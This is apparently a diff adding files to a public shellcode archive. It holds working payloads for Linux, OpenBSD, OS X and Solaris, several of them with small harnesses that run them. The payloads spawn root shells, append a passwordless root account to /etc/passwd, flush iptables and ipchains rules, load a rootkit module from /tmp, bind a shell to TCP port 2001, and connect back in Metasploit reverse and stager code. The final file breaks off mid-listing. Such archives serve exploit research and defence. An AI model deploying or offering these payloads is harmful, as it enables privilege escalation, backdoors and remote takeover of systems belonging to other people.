"\xb0\x0b" /* mov al, 0x0b */
"\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */
"\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */
"\xcd\x80" /* int 0x80 */
/* callz: call start */
"\xe8\xd1\xff\xff\xff" /* call start */
/* data - command to execve() */
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f"
"\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34"
"\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68";
/** test out the shellcode **/
main ()
{
void (*sc)() = (void *)shellc; sc();
}

52
shellcodes/linux_x86/43661.c Normal file
View file

@ -0,0 +1,52 @@
/*
* Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve shellcode.
(Linux x86)
* Author: Cody Tubbs (loophole of hhp).
* www.hhp-programming.net / pigspigs@yahoo.com
* 12/20/2000.
*
* F.U. to ph1x(ry4n). -From me and dxmd...
* [If I ripped this, show me the source... or better yet
* go barrow a shovel so you can dig up deeper shit.]
*/
unsigned char hhpcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66"
"\xb9\x1c\x02\x80\x36\x03\x46\xe2\xfa\xea\xb8\x03\x03\x03\x2c\x61"
"\x6a\x6d\x2c\x70\x6b\x03\x7d\x03\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x7f\x79\x75\x76\x76\x77\x72"
"\x6e\x69\x68\x6d\x70\x76\x76\x72\x6e\x69\x64\x65\x60\x63\x5e\x58"
"\x58\x5e\x5d\x5d\x5e\x5c\x61\x64\x6e\x70\x78\xa5\xaf\xb1\xb5\xbf"
"\xbc\xc0\xc6\xc6\xc1\xc2\xbd\xbe\xb9\xbb\xb6\xac\xaa\xa0\x6d\x6f"
"\x66\x6a\x69\x64\x55\x26\x33\x4d\x54\x5d\x43\x38\x35\x46\x40\x63"
"\x60\x61\x55\x48\x49\x4d\x5d\x66\x6e\x6a\x64\x63\x59\x54\x63\x69"
"\x6f\x70\x7a\x7b\x77\x7b\x79\x75\x71\x6d\x72\x72\x70\x71\x72\x6d"
"\x72\x70\x70\x70\x79\x76\x6c\x6d\x6f\x6e\x68\x70\x75\x6e\x65\x65"
"\x69\x68\x72\x75\x7d\x7f\x7e\x7d\x7f\x79\x78\x78\x7e\x79\x7e\x7d"
"\x7f\x74\x75\x77\x70\x75\x79\x7f\x78\x7a\x75\x71\x73\x72\x09\x03"
"\x2c\x67\x66\x75\x2c\x67\x70\x73\x03\x82\xef\x64\x28\x03\x03\x8a"
"\xf5\x56\x8a\xe6\x80\xef\x1f\x54\x55\x50\xeb\x03\x03\x03\x03\x58"
"\x82\xc0\xb9\x12\x03\x03\xc4\x46\xfb\x03\x03\x03\x03\xc4\x46\xff"
"\x03\x03\x03\x03\x8e\x80\x76\xee\xfc\xfc\x8a\x46\xfb\x8e\xb8\x7e"
"\xee\xfc\xfc\x8e\x90\x93\xee\xfc\xfc\x8a\x56\xeb\x8e\x88\x24\xed"
"\xfc\xfc\x8a\xcd\xbb\x06\x03\x03\x03\xba\x02\x03\x03\x03\xb9\x83"
"\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\x46\xf7\xbb\x2a\x03\x03\x03"
"\x88\x76\xf7\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03"
"\x88\x76\xe7\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a\xf0\xce\x83"
"\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3\x03\x03\x03"
"\x03\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9\x02\x03\x03\x03"
"\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54\x01\x03\x03\x7d"
"\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a"
"\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3"
"\x03\x03\x03\x03\x93\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9"
"\x02\x03\x03\x03\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54"
"\x01\x03\x03\x7d\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03"
"\x03\x03\x50\x8a\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce"
"\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03"
"\x88\x76\xf7\x50\x8a\xf0\xce\x83\xbb\x45\x03\x03\x03\x32\xf5\x32"
"\xca\x50\x8a\xf0\xce\x83\x8e\x7e\xfb\xbb\x08\x03\x03\x03\x88\x76"
"\xfb\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x32\xc3\x8e\x66\xdb\x58"
"\x5d\x5c\xca\xc0\x93\x69";
typedef void (*F)();
main(){F a;a=(F)(&hhpcode);a();}

39
shellcodes/linux_x86/43662.c Normal file
View file

@ -0,0 +1,39 @@
Linux x86 shellcode that uses execve and echo >> to create a passwordless
root account.
Author: zillion
Email : zillion@safemode.org
Homepage: safemode.org
File: w000t-shell.c
/*
* This shellcode will add a passwordless local root account 'w000t'
* Written by zillion@safemode.org
*
* Why so big ? it uses execve ;-)
*/
char shellcode[]=
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
"\x44\x44";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

32
shellcodes/linux_x86/43663.c Normal file
View file

@ -0,0 +1,32 @@
Author: zillion
Email: zillion@safemode.org
Homepage: http://www.safemode.org
Linux x86 shell code that does an execve of /sbin/ipchains -F
File name: flush-ipchains-shellcode.c
/*
* This shellcode will do /sbin/ipchains -F
* Written by zillion@safemode.org
*
*/
char shellcode[]=
"\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
"\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x38\x2d\x46\x32\x33\x34"
"\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

31
shellcodes/linux_x86/43664.c Normal file
View file

@ -0,0 +1,31 @@
Author: zillion
Email: zillion@safemode.org
Home: http://www.safemode.org
Linux x86 shellcode that does an execve() of /sbin/iptables -F in order to
flush activated firewall rules.
File: flush-iptables-shell.c
/*
* This shellcode will do /sbin/iptables -F
* Written by zillion@safemode.org
*
*/
char shellcode[]=
"\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
"\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x38\x2d\x46\x32\x33\x34"
"\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

53
shellcodes/openbsd_x86/43633.c Normal file
View file

@ -0,0 +1,53 @@
/* The modload shellcode
loads /tmp/o.o module
very usefull if you have rootkit as kernel module in the /tmp dir
and you can easily change the path directly in the code
Size 66 bytes
OS OpenBSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
push eax
push long 0x68732f6e
push long 0x69622f2f
mov ebx,esp
push eax
push word 0x632d
mov edi,esp
push eax
push esi
push edi
push ebx
mov edi,esp
push eax
push edi
push ebx
push eax
mov al,0x3B
int 0x80
callme:
call main
db '/sbin/modload /tmp/o.o'
*/
char shellcode[] =
"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89"
"\xe7\x50\x57\x53\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff\x2f"
"\x73\x62\x69\x6e\x2f\x6d\x6f\x64\x6c\x6f\x61\x64\x20"
"\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f"; // "/tmp/o.o" <<put your path here!
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

57
shellcodes/openbsd_x86/43634.c Normal file
View file

@ -0,0 +1,57 @@
/* The modload shellcode
setuid(0)
loads /tmp/o.o module
very usefull if you have rootkit as kernel module in the /tmp dir
Size 74 bytes
OS OpenBSD
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
push eax
mov al,0x17
push eax
int 0x80
xor eax,eax
push eax
push long 0x68732f6e
push long 0x69622f2f
mov ebx,esp
push eax
push word 0x632d
mov edi,esp
push eax
push esi
push edi
push ebx
mov edi,esp
push eax
push edi
push ebx
push eax
mov al,0x3B
int 0x80
callme:
call main
db '/sbin/modload /tmp/o.o'
*/
char shellcode[] =
"\xeb\x2d\x5e\x31\xc0\x50\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68"
"\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d"
"\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57\x53\x50\xb0\x3b"
"\xcd\x80\xe8\xce\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6d\x6f"
"\x64\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

46
shellcodes/osx/43618.c Normal file
View file

@ -0,0 +1,46 @@
/*
Title : OSX/x86 intel - execve(/bin/sh) - 24 bytes
Type : Shellcode
Author : Simon Derouineau - simon.derouineau [AT] ingesup.com
Platform : Mac OSX/Intel. Tested on 10.6.4 Build 10F569
Informations : This code has to be compiled with gcc -m32 switch on 10.6.0+
More informations : x86-64 code is more secured than x86 code on OSX platform :
Canaries are added, Stack and heap are non-executable, etc.
Also, cat /var/db/dyld/dyld_shared_cache_x86_64.map shows that no memory can be
mapped with WX flags, while it's possible with x86 code ( according to /var/db/dyld/dyld_shared_cache_i386.map).
The method used here is the easier one, heap is executable in x86 applications,
as described in "The Mac Hacker's Handbook", written by Charlie Miller.
The trick is to memcopy the shellcode to the heap before executing it.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= "\x31\xC0" // xor eax,eax
"\x50" // push eax
"\x68\x2F\x2F\x73\x68" // push dword
"\x68\x2F\x62\x69\x6E" // push dword
"\x89\xE3" // mov ebx,esp
"\x50\x50\x53" // push eax, push eax, push ebx
"\xB0\x3B" // mov al,0x3b
"\x6A\x2A" // push byte 0x2a
"\xCD\x80" // int 0x80
int main(int argc, char *argv[]){
void (*f)();
char *x = malloc(sizeof(shellcode));
memcpy(x, shellcode, sizeof(shellcode));
f = (void (*)()) x;
f();
}

106
shellcodes/osx_ppc/43610.c Normal file
View file

@ -0,0 +1,106 @@
;;;
;;; PowerPC OSX remote findsock by recv() key shellcode
;;;
;;; Dino Dai Zovi < ddz@theta44.org >, 20040816
;;;
.globl _shellcode
.text
.set KEY, 0x5858580a
.set PTHREAD_EXIT, 0x90017021 ; OSX 10.3.X
_shellcode:
Lfindsock:
addis r27, 0, hi16(KEY)
ori r27, r27, lo16(KEY)
addis r31, 0, hi16(0xffff0000)
srawi r31, r31, 11
mtctr r31
;; Count down sockets backwards in hopes of getting our most recent
;; connection (if we have multiple).
L0: mfctr r3
addi r3, r3, -1 ; r3 = socket file descriptor
addi r4, r1, -4 ; r4 = stack buffer
sub r5, r1, r4 ; r5 = 4
li r6, 0x4140
srawi r6, r6, 7 ; r6 = MSG_PEEK | MSG_DONTWAIT
addi r7, r5, -4 ; r7 = 0
addi r8, r5, -4 ; r8 = 0
li r30, 0x3aff
srawi r0, r30, 9 ; load syscall number into r0
cmplw r29, r29
.long 0x44ffff02 ; recvfrom(s, buf, 4, 0x82, 0, 0)
bdnzt eq, L0
;; On syscall error, attempt compare anyway and loop
lwz r28, -4(r1)
cmplw r28, r27
bdnzf eq, L0
;;; At this point our socket fd is in ctr
;;;
;;; dup2(2) our socket (in ctr) to stdin, stdout, stderr
;;;
Ldup_fds:
li r30, 0x2d01
srawi r0, r30, 7
li r30, 0x666
srawi r30, r30, 9
mfctr r3
addi r4, r30, -1
.long 0x44ffff02 ; dup2(sock, 2)
.long 0x7c842008
mfctr r3
addi r4, r30, -2
.long 0x44ffff02 ; dup2(sock, 1)
.long 0x7c842008
mfctr r3
addi r4, r30, -3
.long 0x44ffff02 ; dup2(sock, 0)
.long 0x7c842008
;;;
;;; VForking shellcode - Call vfork() and execute /bin/sh in child process.
;;; In parent, we exec "/bin/si" ("/bin/sh" + 1), fail, and run the code that
;;; follows the execve().
;;;
Lfork_execve_binsh:
;; call vfork (necessary to exec in threaded programs)
li r30, 0x42ff
srawi r0, r30, 8
.long 0x44ffff02
.long 0x7c842008
xor r31, r31, r31
lis r30, 0x2f2f
addi r30, r30, 0x7367
add r30, r30, r4 ; In child, $r4 should be zero
lis r29, 0x2f62
addi r29, r29, 0x696e
xor r28, r28, r28
addi r27, r1, -12
stmw r27, -12(r1) ; -12 is arbitrary null-eliding constant
addi r4, r1, -12
addi r3, r1, -4
xor r5, r5, r5
li r30, 30209
srawi r0, r30, 9 ; r0 = 59
.long 0x44ffff02 ; execve(path, argv, NULL)
Lparent:
;;;
;;; Call pthread_exit in parent process
;;;
Lpthexit:
addis r31, 0, hi16(PTHREAD_EXIT) ; pthread_exit
ori r31, r31, lo16(PTHREAD_EXIT)
mtctr r31
bctrl

77
shellcodes/osx_ppc/43611.asm Normal file
View file

@ -0,0 +1,77 @@
;;
;
; Name: single_reverse_tcp
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Connect back and spawn a shell
;
;
;;
.globl _main
.text
_main:
;; socket
li r3, 2
li r4, 1
li r5, 6
li r0, 97
sc
xor r0, r0, r0
mr r30, r3
bl _connect
.long 0x00022211
.long 0x7f000001
_connect:
mflr r4
li r5, 0x10
li r0, 98
mr r3, r30
sc
xor. r5, r5, r5
_setup_dup2:
li r5, 2
_dup2:
li r0, 90
mr r3, r30
mr r4, r5
sc
xor r0, r0, r0
subi r5, r5, 1
cmpwi r5, -1
bnel _dup2
_fork:
li r0, 2
sc
xor. r5, r5, r5
_execsh:
xor. r5, r5, r5
bnel _execsh
mflr r3
addi r3, r3, 28
stw r3, -8(r1) ; argv[0] = path
stw r5, -4(r1) ; argv[1] = NULL
subi r4, r1, 8 ; r4 = {path, 0}
li r0, 59
sc ; execve(path, argv, NULL)
; csh removes the need for setuid()
path:
.ascii "/bin/csh"
.long 0x00414243

52
shellcodes/osx_ppc/43612.asm Normal file
View file

@ -0,0 +1,52 @@
;;
;
; Name: stager_sock_find_peek
; Qualities: Null-Free
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload will recv() downward until the read
; data contains the search tag (0xXXXX1337). Once the
; tag is located, it will jump into the payload. The
; recv() call is passed the MSG_PEEK flag, the stage
; will need to flush the recv() queue before doing
; something like dup2'ing a shell.
;
;;
.globl _main
.text
_main:
li r29, 0xfff
li r30, 0xfff
addic. r28, r29, -0xfff +1
findsock:
subf. r30, r28, r30
blt _main
subi r0, r29, 0xfff - 102
mr r3, r30
subi r4, r1, 4104
li r5, 4095
subi r6, r29, 0xfff - 0x82
.long 0x44ffff02
xor. r6, r6, r6
lhz r27, -4104(r1)
cmpwi r27, 0x1337
bne findsock
gotsock:
subi r4, r1, 4100
mtctr r4
blectr
xor. r6, r6, r6

49
shellcodes/osx_ppc/43613.asm Normal file
View file

@ -0,0 +1,49 @@
;;
;
; Name: stager_sock_find
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload will recv() downward until the read
; data contains the search tag (0xXXXX1337). Once the
; tag is located, it will jump into the payload.
;
;;
.globl _main
.text
_main:
li r29, 0xfff
li r30, 0xfff
addic. r28, r29, -0xfff +1
findsock:
subf. r30, r28, r30
blt _main
subi r0, r29, 0xfff - 102
mr r3, r30
subi r4, r1, 4104
li r5, 4095
subi r6, r29, 0xfff - 0x80
.long 0x44ffff02
xor. r6, r6, r6
lhz r27, -4104(r1)
cmpwi r27, 0x1337
bne findsock
gotsock:
subi r4, r1, 4100
mtctr r4
blectr
xor. r6, r6, r6

76
shellcodes/osx_ppc/43614.asm Normal file
View file

@ -0,0 +1,76 @@
;;
;
; Name: stager_sock_reverse_nf.asm
; Qualities: Null-Free
; Platforms: MacOS X / PPC
; Authors: H D Moore < hdm [at] metasploit.com >
; Version: $Revision: 1.1 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Connects back, reads 8192 bytes, jumps into payload.
; Socket descriptor is left in r30.
;
;;
.globl _main
.text
_main:
_socket:
li r27, 0x3030 + 97
subi r0, r27, 0x3030 + 97 - 97
subi r3, r27, 0x3030 + 97 - 2
subi r4, r27, 0x3030 + 97 - 1
subi r5, r27, 0x3030 + 97 - 6
.long 0x44ffff02
xor r5, r5, r5
mr r30, r3
_storeaddr:
; port - patch the xor word
li r25, (0x2211^0x4142)
xori r25, r25, 0x4142
subi r29, r27, 0x3030 + 97 - 2
slwi r29, r29, 16
or r29, r29, r25
stw r29, -20(r1)
; addr - patch the xor dword
lis r29, hi16(0x7f000001^0x01020304)
ori r29, r29, lo16(0x7f000001^0x01020304)
lis r28, hi16(0x01020304)
ori r28, r28, lo16(0x01020304)
xor r29, r29, r28
stw r29, -16(r1)
konnect:
la r4, -20(r1)
subi r5, r27, 0x3030 + 97 - 16
subi r0, r27, 0x3030 + 97 - 98
mr r3, r30
.long 0x44ffff02
xor r5, r5, r5
reader:
li r29, 0x3330
srawi r29, r29, 12
subi r0, r27, 0x3030 + 97 - 3
mr r3, r30
subi r4, r1, 8192+44
li r5, 8192+44
mtctr r4
.long 0x44ffff02
xor r5, r5, r5
xor. r5, r5, r5
blectr
xor r5, r5, r5

19
shellcodes/osx_ppc/43615.c Normal file
View file

@ -0,0 +1,19 @@
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\x28\x1a\x60\xc6\x7f\x0e\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\x10\x7a\x7f\x0c"
"\x10\x9a\x7f\x0f\x10\xba\x7f\x08\x10\x1a\x7f\x6f\x6c\x1a\x7f\x0c"
"\x54\x1a\x7d\x76\x54\x64\x64\x76\x60\x1a\x7f\x03\x28\x18\x60\x4e"
"\x28\x1a\x7f\x0e\x54\x92\x7d\xa8\x10\xba\x7f\x1e\x10\x1a\x7f\x66"
"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\x1a\x7f\x64"
"\x57\xd9\x8c\x76\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xd9\x8c\x76"
"\x10\x1a\x7f\x10\x10\x9a\x7f\x1e\xb8\x9b\x80\xe6\x10\xbb\x80\xe6"
"\x10\x9b\x80\xfe\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x54\x64\x64\x76"
"\x10\xba\x7f\x0c\x10\x1a\x7f\x54\x57\xd9\x8c\x76\x54\xbe\x54\x76"
"\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x10\xbf\x80\xf1\x04\x1f\x80\xf1"
"\x68\x98\x80\xeb\x10\x1a\x7f\x4c\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76"
"\x54\xbf\x55\x77\x68\x98\x80\xf3\x54\x72\x7d\xa8\x10\x79\x7f\x26"
"\xb8\x7b\x80\xf6\xb8\xbb\x80\xf2\x10\x9b\x80\xf6\x10\x1a\x7f\x35"
"\x54\x1a\x7b\xa2\x6c\x1a\x7f\x0c\x54\x1a\x7d\x76\x57\xfa\x7f\x06"
"\x07\x78\x16\x60\x07\x79\x0c\x66\x28\x1a\x7f\x0e";

33
shellcodes/osx_ppc/43616.asm Normal file
View file

@ -0,0 +1,33 @@
;;; $Id: ppc-execve.s,v 1.1 2003/03/01 01:10:48 ghandi Exp $
;;; PPC MacOS X (maybe others) shellcode
;;;
;;; After assembly, change bytes 2 and 3 of the 'sc' instruction encoding
;;; from 0x00 to 0xff.
;;;
;;; ghandi < ghandi@mindless.com >
;;;
.globl _execve_binsh
.text
_execve_binsh:
;; Don't branch, but do link. This gives us the location of
;; our code. Move the address into GPR 31.
xor. r5, r5, r5 ; r5 = NULL
bnel _execve_binsh
mflr r31
;; Use the magic offset constant 268 because it makes the
;; instruction encodings null-byte free.
addi r31, r31, 268+36
addi r3, r31, -268 ; r3 = path
;; Create argv[] = {path, 0} in the "red zone" on the stack
stw r3, -8(r1) ; argv[0] = path
stw r5, -4(r1) ; argv[1] = NULL
subi r4, r1, 8 ; r4 = {path, 0}
;; 59 = 30209 >> 9 (trick to avoid null-bytes)
li r30, 30209
srawi r0, r30, 9 ; r0 = 59
sc ; execve(path, argv, NULL)
path: .asciz "/bin/sh"

62
shellcodes/osx_ppc/43617.c Normal file
View file

@ -0,0 +1,62 @@
/*
* [MacOSX/PowerPC]
* Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL), exit()
* 72 bytes
* hophet [at] gmail.com
* http://www.nlabs.com.br/~hophet/
*
*/
#include "stdio.h"
#include "string.h"
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6"
"\x3b\xeb\x01\x71"
"\x39\x40\x01\x71"
"\x39\x1f\xfe\xce"
"\x7c\xa8\x29\xae"
"\x38\x7f\xfe\xc7"
"\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8"
"\x38\x0a\xfe\xca"
"\x44\xff\xff\x02"
"\x60\x60\x60\x60"
"\x38\x0a\xfe\x90"
"\x44\xff\xff\x02"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x54";
int main() {
void (*p)();
p = (void *)&shellcode;
printf("Lenght: %d\n", strlen(shellcode));
p();
}
/*
.globl _main
.text
_main:
xor. r5, r5, r5 // r5 = NULL
bnel _main
mflr r11
addi r31, r11, 369
li r10, 369
addi r8, r31, -306
stbx r5, r8, r5
addi r3, r31, -313
stw r3, -8(r1) // [/bin/sh]
stw r5, -4(r1)
subi r4, r1, 8 // [/bin/sh]
addi r0, r10, -310 // r0 = 59
.long 0x44ffff02 // sc opcode
.long 0x60606060 // NOP
addi r0, r10, -368 // r0 = 1
.long 0x44ffff02 // sc opcode
string: .asciz "/bin/shT"
*/

0
shellcodes/solaris_sparc/13489.c → shellcodes/solaris_mips/13489.c
View file

73
shellcodes/solaris_sparc/43621.c Normal file
View file

@ -0,0 +1,73 @@
/*
* Solaris shellcode - setreuid(geteuid()), setregid(getegid()), execve /bin/sh
*
* Claes M. Nyberg 20020124
* ,
*/
#include
static char solaris_code[] =
/* geteuid() */
"\x82\x10\x20\x18" /* mov 24, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\x90\x02\x60\x01" /* add %o1, 1, %o0 */
/* setreuid() */
"\x90\x22\x20\x01" /* sub %o0, 1, %o0 */
"\x92\x10\x3f\xff" /* mov -1, %o1 */
"\x82\x10\x20\xca" /* mov 202, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* getegid() */
"\x82\x10\x20\x2f" /* mov 47, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
"\x90\x02\x60\x01" /* add %o1, 1, %o0 */
/* setregid() */
"\x90\x22\x20\x01" /* sub %o0, 1, %o0 */
"\x92\x10\x3f\xff" /* mov -1, %o1 */
"\x82\x10\x20\xcb" /* mov 203, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* execve(/bin/sh ..) */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */
"\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */
"\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */
"\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */
"\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */
"\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */
"\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */
"\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */
"\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */
"\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */
"\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */
"\x82\x10\x20\x3b" /* mov 59, %g1 */
"\x91\xd0\x20\x08" /* ta 0x8 */
/* exit() */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08"; /* ta 0x8 */
static char _solaris_code[] =
"\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22"
"\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xca\x91\xd0\x20\x08"
"\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22"
"\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08"
"\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
"\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8"
"\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23"
"\xbf\xec\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x82\x10\x20\x01\x91\xd0\x20\x08";
int
main(void)
{
void (*code)() = (void *)_solaris_code;
printf("Shellcode length: %d\n", strlen(_solaris_code));
code();
return(1);
}

87
shellcodes/solaris_sparc/43622.asm Normal file
View file

@ -0,0 +1,87 @@
!!! $Id: sparc-bind.s,v 1.1 2003/03/01 01:10:51 ghandi Exp $
!!! Bind /bin/sh to TCP port 2001. Calls setuid(0) so /bin/sh won't
!!! drop privileges. After assembly, change the third byte in the
!!! trap instructions to 0x38 to avoid having spaces in the input so that
!!! it may be used in an HTTP GET request. For Solaris/SPARC.
!!!
!!! "I've come here to chew bubble-gum and kick ass...And I'm all out of
!!! bubble gum."
!!! -- Nada (Roddy Piper), "They Live"
!!!
!!! -ghandi < ghandi@mindless.com >
!!!
.global bindsh
.type bindsh,#function
bindsh: sub %sp, 16, %l0 ! struct sockaddr sa;
sub %sp, %l0, %l7;
st %l7, [%sp - 20] ! int sa_len = 16;
sub %l7, 14, %o0
sub %l7, 14, %o1
xor %l1, %l1, %o2
xor %l1, %l1, %o3 ! %o3 will be used as a %g0
sub %l7, 15, %o4
add %l7, (230 - 16), %g1
ta 8
xor %o2, %o0, %l2 ! s = socket(AF_INET, SOCK_STREAM, 0);
sth %o1, [%sp - 16] ! sa.sin_family = AF_INET;
mov 2001, %l6
sth %l6, [%sp - 14] ! sa.sin_port = 2001;
st %g0, [%sp - 12] ! sa.sin_addr.s_addr = INADDR_ANY;
xor %o3, %l2, %o0
xor %o3, %l0, %o1
xor %o3, %l7, %o2
